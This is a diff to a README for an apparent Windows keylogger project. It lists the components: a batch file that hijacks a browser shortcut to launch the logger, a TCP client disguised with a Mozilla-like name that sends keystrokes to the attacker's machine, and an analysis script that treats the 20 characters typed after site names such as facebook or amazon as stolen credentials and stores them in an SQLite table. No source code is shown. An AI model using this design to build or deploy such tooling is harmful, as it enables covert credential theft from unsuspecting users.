adeptio/Windows-Keylogger/README.md

 - **launch.bat**: Batch file used to manipuate a browser shortcut to also run our keylogger.

-- **mozillassc.py**: TCP Client (disguised) to send raw keylog output to TCP Server listening on hacker's machine.
+- **mozillassc.exe**: TCP Client to send raw keylog output to TCP Server listening on hacker's machine (disguised and converted to exe from .pyw).

 On hacker's system:

-- **keylogger_format.py**: Utility program to format and perform rough analysis on keylogger output.
+- **keylogger_analysis.py**: Searches keylog output for hacker defined keywords (facebook, amazon, etc).
+Stores instances of these keywords and the following 20 input characters in a database for closer analysis.
+The assumption is that credentials are entered within 20 characters of someone entering a site name.

 - **crash_backup.pyw**: Source code for keylogger.

+- **mozillassc.pyw**: Source code for TCP Client.

 - **auths.db**: Database fed by SQLite3.
 Currently one table, 'credentials' (keyword, rough_creds).